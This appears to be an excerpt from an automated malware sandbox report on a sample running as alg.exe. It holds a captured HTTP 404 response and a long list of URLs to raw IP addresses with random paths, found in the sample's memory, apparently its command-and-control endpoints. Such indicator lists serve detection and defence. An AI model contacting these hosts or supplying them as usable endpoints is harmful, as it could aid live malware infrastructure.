page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 20 Oct 2024 16:42:36 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: alg.exe, 00000006.00000003.2134781228.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/
Source: alg.exe, 00000006.00000003.2767578204.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/1gk
Source: alg.exe, 00000006.00000003.2134781228.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/3
Source: alg.exe, 00000006.00000003.2118218789.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134781228.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/;
Source: alg.exe, 00000006.00000003.2767578204.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/O
Source: alg.exe, 00000006.00000003.2866913442.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/m
Source: alg.exe, 00000006.00000003.2118218789.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134781228.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/ngsO
Source: alg.exe, 00000006.00000003.2118218789.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134781228.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/o
Source: alg.exe, 00000006.00000003.2134781228.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/or
Source: alg.exe, 00000006.00000003.2134781228.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/pfoxkxwneqnmhcsc
Source: alg.exe, 00000006.00000003.2118218789.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2118218789.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/wbgwmpvkxxw
Source: alg.exe, 00000006.00000003.2767578204.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2767578204.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2788435260.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/wgsqpusbi
Source: alg.exe, 00000006.00000003.2866913442.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/wlirwlunhdx
Source: alg.exe, 00000006.00000003.2134781228.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/pfoxkxwneqnmhcsc
Source: alg.exe, 00000006.00000003.2118218789.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/wbgwmpvkxxw
Source: alg.exe, 00000006.00000003.1983164372.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1943793685.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1929406153.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2023523733.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1929140492.00000000005A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.1
Source: alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/
Source: alg.exe, 00000006.00000003.2202750803.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/g
Source: alg.exe, 00000006.00000003.2214400223.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/i
Source: alg.exe, 00000006.00000003.2202750803.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/rO
Source: alg.exe, 00000006.00000003.2214400223.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/s
Source: alg.exe, 00000006.00000003.2202750803.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/yr
Source: alg.exe, 00000006.00000003.2202750803.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/yrfbcbrtstm
Source: alg.exe, 00000006.00000003.2202750803.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/yrgsfg
Source: alg.exe, 00000006.00000003.2214400223.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138:80/iw
Source: alg.exe, 00000006.00000003.2202750803.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138:80/yrX
Source: alg.exe, 00000006.00000003.1894394555.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1884187147.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1911980728.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1895017111.00000000005A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.143/qdsfjdjxkwbsc
Source: alg.exe, 00000006.00000003.1983164372.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2081778986.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2063437906.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2100147605.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1943793685.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1894394555.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1929406153.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2135520274.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1884187147.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1911980728.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2117644955.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1895017111.00000000005A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134367323.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2023523733.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1929140492.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2097746402.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2135821312.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2099434092.00000000005A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.143/qdsfjdjxkwbsc7p
Source: alg.exe, 00000006.00000003.2183000451.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2100147605.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2175491692.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183840465.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2135520274.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2156038418.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2117644955.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134367323.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2145188549.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2202750803.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2097746402.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2135821312.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2099434092.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2158059198.00000000005A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.1
Source: alg.exe, 00000006.00000003.1983164372.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2081778986.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2063437906.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1943793685.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2023523733.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10
Source: alg.exe, 00000006.00000003.1983164372.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1943793685.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107
Source: alg.exe, 00000006.00000003.2175491692.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1929406153.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1839303243.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2652493230.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2654500801.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1929140492.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2674707588.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1839625966.0000000000579000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2594812918.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/0:R
Source: alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2654500801.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/1
Source: alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/3
Source: alg.exe, 00000006.00000003.1839303243.000000000058B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/d
Source: alg.exe, 00000006.00000003.1839303243.000000000058B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/d&UZm
Source: alg.exe, 00000006.00000003.2175491692.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2175491692.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/hudnfeopxibfg
Source: alg.exe, 00000006.00000003.2654500801.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/lix
Source: alg.exe, 00000006.00000003.2654500801.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/ngs
Source: alg.exe, 00000006.00000003.2183000451.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/qjnulfbcbrtstm
Source: alg.exe, 00000006.00000003.2183000451.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/qjnulfbcbrtstmZ
Source: alg.exe, 00000006.00000003.2654500801.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/rginqqoeriix
Source: alg.exe, 00000006.00000003.2656006967.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2657080595.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/rginqqoeriixfqRP
Source: alg.exe, 00000006.00000003.2654500801.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/rginqqoeriixgs
Source: alg.exe, 00000006.00000003.2656006967.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/rginqqoeriixr
Source: alg.exe, 00000006.00000003.2175491692.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/s7
Source: alg.exe, 00000006.00000003.2175491692.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2183000451.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/sO
Source: alg.exe, 00000006.00000003.1929406153.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1929140492.00000000005A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/vdlffosnapnrfupl
Source: alg.exe, 00000006.00000003.1912032878.000000000057E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/vuaobjwmdbxko
Source: alg.exe, 00000006.00000003.2183000451.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134781228.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2262144345.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2214400223.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2229034246.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2202750803.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2156815430.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2175491692.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2243645875.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2118218789.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2081257247.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/dI
Source: alg.exe, 00000006.00000003.2175491692.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/hudnfeopxibfg
Source: alg.exe, 00000006.00000003.2656006967.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2657080595.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/ngqgkogciouo
Source: alg.exe, 00000006.00000003.2183000451.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/qjnulfbcbrtstm
Source: alg.exe, 00000006.00000003.2656006967.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/rginqqoeriixP
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2262144345.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2694896622.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2594812918.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/
Source: alg.exe, 00000006.00000003.2594812918.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/P3
Source: alg.exe, 00000006.00000003.2262144345.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/gs
Source: alg.exe, 00000006.00000003.2594812918.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/lix
Source: alg.exe, 00000006.00000003.2594812918.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/lixO
Source: alg.exe, 00000006.00000003.2262144345.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2262144345.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/prvlplgfktyghiuq
Source: alg.exe, 00000006.00000003.2594812918.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/w
Source: alg.exe, 00000006.00000003.2262144345.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248:80/prvlplgfktyghiuq
Source: alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/
Source: alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/O
Source: alg.exe, 00000006.00000003.2528797905.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2516552846.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2478943673.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2504519718.000000000057C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/eaff
Source: alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/eaff7
Source: alg.exe, 00000006.00000003.2505676462.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/gs?
Source: alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/jfogdd
Source: alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/jfogdd4/
Source: alg.exe, 00000006.00000003.2478943673.000000000057C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/jfogddQBrows
Source: alg.exe, 00000006.00000003.2505676462.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.100.26.245/k
Source: alg.exe, 00000006.00000003.2919770823.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2919519329.00000000005CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/
Source: alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/dwm
Source: alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/unxx
Source: alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34:80/unxS0
Source: alg.exe, 00000006.00000003.2894328547.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2788435260.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/
Source: alg.exe, 00000006.00000003.2505676462.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/f1ff7
Source: alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/hbbreaeoihjkosw
Source: alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/hbbreaeoihjkoswM
Source: alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/n
Source: alg.exe, 00000006.00000003.2788435260.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/sywsqcciw
Source: alg.exe, 00000006.00000003.2788435260.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45/sywsqcciwings
Source: alg.exe, 00000006.00000003.2788435260.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.211.97.45:80/sywsqcciw
Source: alg.exe, 00000006.00000003.2229034246.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/
Source: alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/Uw
Source: alg.exe, 00000006.00000003.2243645875.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2243645875.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/dobp
Source: alg.exe, 00000006.00000003.2229034246.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/gobhb
Source: alg.exe, 00000006.00000003.2229034246.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/gobhbq
Source: alg.exe, 00000006.00000003.2229034246.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/gobhbstm
Source: alg.exe, 00000006.00000003.2229034246.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/gs
Source: alg.exe, 00000006.00000003.2262144345.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/gs?
Source: alg.exe, 00000006.00000003.2229034246.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2262144345.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/obhb
Source: alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/s
Source: alg.exe, 00000006.00000003.2243645875.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160:80/dobpp9U
Source: alg.exe, 00000006.00000003.2229034246.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160:80/gobhbp9U
Source: alg.exe, 00000006.00000003.2383978998.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/swlP
Source: alg.exe, 00000006.00000002.2941335928.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2674707588.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/
Source: alg.exe, 00000006.00000002.2941335928.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/1G
Source: alg.exe, 00000006.00000002.2941335928.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2674707588.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/3
Source: alg.exe, 00000006.00000003.2674707588.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/3s
Source: alg.exe, 00000006.00000003.2674707588.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/fkolun
Source: alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/kfucjjkorih
Source: alg.exe, 00000006.00000002.2941335928.000000000057A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/kfucjjkorihivfeP
Source: alg.exe, 00000006.00000002.2941335928.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/ngs
Source: alg.exe, 00000006.00000002.2941335928.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/ngs?
Source: alg.exe, 00000006.00000002.2941335928.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86/xurncvjdsxxnivfe
